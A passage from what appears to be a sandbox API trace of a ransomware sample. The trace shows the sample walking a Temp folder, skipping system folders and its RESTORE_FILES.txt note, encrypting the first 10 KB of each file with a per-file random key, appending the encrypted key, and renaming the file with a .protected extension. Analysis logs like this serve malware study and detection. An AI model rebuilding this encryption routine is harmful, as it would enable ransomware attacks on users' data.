lpSrch=".rar") returned 0x0 [0086.869] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv") returned 75 [0086.869] StrStrW (lpFirst="oDE5vXHnCSjoYziwyf.mkv", lpSrch=".zip") returned 0x0 [0086.869] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.870] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.870] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.871] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.871] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.871] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.871] CloseHandle (hObject=0xd8) returned 1 [0086.871] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv.protected") returned 85 [0086.871] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ode5vxhncsjoyziwyf.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oDE5vXHnCSjoYziwyf.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ode5vxhncsjoyziwyf.mkv.protected")) returned 1 [0086.873] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.873] lstrcmpiW (lpString1="oeOSjXGFHavOUNXF5y.doc", lpString2="Windows") returned -1 [0086.873] lstrcmpiW (lpString1="oeOSjXGFHavOUNXF5y.doc", lpString2="Program Files") returned -1 [0086.873] lstrcmpiW (lpString1="oeOSjXGFHavOUNXF5y.doc", lpString2="Program Files (x86)") returned -1 [0086.873] lstrcmpiW (lpString1="oeOSjXGFHavOUNXF5y.doc", lpString2="$Recycle.bin") returned 1 [0086.873] lstrcmpiW (lpString1="oeOSjXGFHavOUNXF5y.doc", lpString2="System Volume Information") returned -1 [0086.873] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc") returned 75 [0086.873] StrStrIW (lpFirst="oeOSjXGFHavOUNXF5y.doc", lpSrch=".protected") returned 0x0 [0086.873] lstrcmpW (lpString1="oeOSjXGFHavOUNXF5y.doc", lpString2="RESTORE_FILES.txt") returned -1 [0086.873] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.873] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\oeosjxgfhavounxf5y.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.873] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc") returned 75 [0086.873] StrStrW (lpFirst="oeOSjXGFHavOUNXF5y.doc", lpSrch=".txt") returned 0x0 [0086.873] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc") returned 75 [0086.873] StrStrW (lpFirst="oeOSjXGFHavOUNXF5y.doc", lpSrch=".rar") returned 0x0 [0086.873] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc") returned 75 [0086.874] StrStrW (lpFirst="oeOSjXGFHavOUNXF5y.doc", lpSrch=".zip") returned 0x0 [0086.874] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.875] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.875] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.875] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.875] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.875] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.876] CloseHandle (hObject=0xd8) returned 1 [0086.876] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc.protected") returned 85 [0086.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\oeosjxgfhavounxf5y.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oeOSjXGFHavOUNXF5y.doc.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\oeosjxgfhavounxf5y.doc.protected")) returned 1 [0086.877] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.877] lstrcmpiW (lpString1="psIA4g.bmp", lpString2="Windows") returned -1 [0086.877] lstrcmpiW (lpString1="psIA4g.bmp", lpString2="Program Files") returned 1 [0086.877] lstrcmpiW (lpString1="psIA4g.bmp", lpString2="Program Files (x86)") returned 1 [0086.877] lstrcmpiW (lpString1="psIA4g.bmp", lpString2="$Recycle.bin") returned 1 [0086.877] lstrcmpiW (lpString1="psIA4g.bmp", lpString2="System Volume Information") returned -1 [0086.877] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp") returned 63 [0086.877] StrStrIW (lpFirst="psIA4g.bmp", lpSrch=".protected") returned 0x0 [0086.877] lstrcmpW (lpString1="psIA4g.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0086.877] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.878] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\psia4g.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.878] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp") returned 63 [0086.878] StrStrW (lpFirst="psIA4g.bmp", lpSrch=".txt") returned 0x0 [0086.878] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp") returned 63 [0086.878] StrStrW (lpFirst="psIA4g.bmp", lpSrch=".rar") returned 0x0 [0086.878] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp") returned 63 [0086.878] StrStrW (lpFirst="psIA4g.bmp", lpSrch=".zip") returned 0x0 [0086.878] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.879] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.879] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.880] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.880] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.880] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.880] CloseHandle (hObject=0xd8) returned 1 [0086.882] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp.protected") returned 73 [0086.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\psia4g.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\psIA4g.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\psia4g.bmp.protected")) returned 1 [0086.883] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.883] lstrcmpiW (lpString1="PZRAEq.pps", lpString2="Windows") returned -1 [0086.883] lstrcmpiW (lpString1="PZRAEq.pps", lpString2="Program Files") returned 1 [0086.883] lstrcmpiW (lpString1="PZRAEq.pps", lpString2="Program Files (x86)") returned 1 [0086.883] lstrcmpiW (lpString1="PZRAEq.pps", lpString2="$Recycle.bin") returned 1 [0086.883] lstrcmpiW (lpString1="PZRAEq.pps", lpString2="System Volume Information") returned -1 [0086.883] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps") returned 63 [0086.883] StrStrIW (lpFirst="PZRAEq.pps", lpSrch=".protected") returned 0x0 [0086.883] lstrcmpW (lpString1="PZRAEq.pps", lpString2="RESTORE_FILES.txt") returned -1 [0086.883] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.883] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pzraeq.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.884] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps") returned 63 [0086.884] StrStrW (lpFirst="PZRAEq.pps", lpSrch=".txt") returned 0x0 [0086.884] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps") returned 63 [0086.884] StrStrW (lpFirst="PZRAEq.pps", lpSrch=".rar") returned 0x0 [0086.884] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps") returned 63 [0086.884] StrStrW (lpFirst="PZRAEq.pps", lpSrch=".zip") returned 0x0 [0086.884] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.885] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.885] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.885] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.886] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.886] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.886] CloseHandle (hObject=0xd8) returned 1 [0086.886] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps.protected") returned 73 [0086.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pzraeq.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\PZRAEq.pps.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pzraeq.pps.protected")) returned 1 [0086.887] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.887] lstrcmpiW (lpString1="SHCjkXKVikAOA8.jpg", lpString2="Windows") returned -1 [0086.887] lstrcmpiW (lpString1="SHCjkXKVikAOA8.jpg", lpString2="Program Files") returned 1 [0086.887] lstrcmpiW (lpString1="SHCjkXKVikAOA8.jpg", lpString2="Program Files (x86)") returned 1 [0086.887] lstrcmpiW (lpString1="SHCjkXKVikAOA8.jpg", lpString2="$Recycle.bin") returned 1 [0086.887] lstrcmpiW (lpString1="SHCjkXKVikAOA8.jpg", lpString2="System Volume Information") returned -1 [0086.887] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg") returned 71 [0086.887] StrStrIW (lpFirst="SHCjkXKVikAOA8.jpg", lpSrch=".protected") returned 0x0 [0086.887] lstrcmpW (lpString1="SHCjkXKVikAOA8.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0086.888] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.888] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\shcjkxkvikaoa8.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.888] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg") returned 71 [0086.888] StrStrW (lpFirst="SHCjkXKVikAOA8.jpg", lpSrch=".txt") returned 0x0 [0086.888] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg") returned 71 [0086.888] StrStrW (lpFirst="SHCjkXKVikAOA8.jpg", lpSrch=".rar") returned 0x0 [0086.888] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg") returned 71 [0086.888] StrStrW (lpFirst="SHCjkXKVikAOA8.jpg", lpSrch=".zip") returned 0x0 [0086.888] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x1ada, lpOverlapped=0x0) returned 1 [0086.889] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffe526, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.889] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1ada, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x1ada, lpOverlapped=0x0) returned 1 [0086.890] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.890] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.890] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.890] CloseHandle (hObject=0xd8) returned 1 [0086.891] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg.protected") returned 81 [0086.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\shcjkxkvikaoa8.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SHCjkXKVikAOA8.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\shcjkxkvikaoa8.jpg.protected")) returned 1 [0086.891] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.892] lstrcmpiW (lpString1="SldrIfqBqG4e.mp3", lpString2="Windows") returned -1 [0086.892] lstrcmpiW (lpString1="SldrIfqBqG4e.mp3", lpString2="Program Files") returned 1 [0086.892] lstrcmpiW (lpString1="SldrIfqBqG4e.mp3", lpString2="Program Files (x86)") returned 1 [0086.892] lstrcmpiW (lpString1="SldrIfqBqG4e.mp3", lpString2="$Recycle.bin") returned 1 [0086.892] lstrcmpiW (lpString1="SldrIfqBqG4e.mp3", lpString2="System Volume Information") returned -1 [0086.892] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3") returned 69 [0086.892] StrStrIW (lpFirst="SldrIfqBqG4e.mp3", lpSrch=".protected") returned 0x0 [0086.892] lstrcmpW (lpString1="SldrIfqBqG4e.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0086.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sldrifqbqg4e.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3") returned 69 [0086.892] StrStrW (lpFirst="SldrIfqBqG4e.mp3", lpSrch=".txt") returned 0x0 [0086.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3") returned 69 [0086.892] StrStrW (lpFirst="SldrIfqBqG4e.mp3", lpSrch=".rar") returned 0x0 [0086.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3") returned 69 [0086.892] StrStrW (lpFirst="SldrIfqBqG4e.mp3", lpSrch=".zip") returned 0x0 [0086.892] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.893] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.893] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.894] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.894] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.894] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.894] CloseHandle (hObject=0xd8) returned 1 [0086.895] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3.protected") returned 79 [0086.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sldrifqbqg4e.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SldrIfqBqG4e.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sldrifqbqg4e.mp3.protected")) returned 1 [0086.896] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.896] lstrcmpiW (lpString1="symNKTPrMBv.flv", lpString2="Windows") returned -1 [0086.896] lstrcmpiW (lpString1="symNKTPrMBv.flv", lpString2="Program Files") returned 1 [0086.896] lstrcmpiW (lpString1="symNKTPrMBv.flv", lpString2="Program Files (x86)") returned 1 [0086.896] lstrcmpiW (lpString1="symNKTPrMBv.flv", lpString2="$Recycle.bin") returned 1 [0086.896] lstrcmpiW (lpString1="symNKTPrMBv.flv", lpString2="System Volume Information") returned -1 [0086.896] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 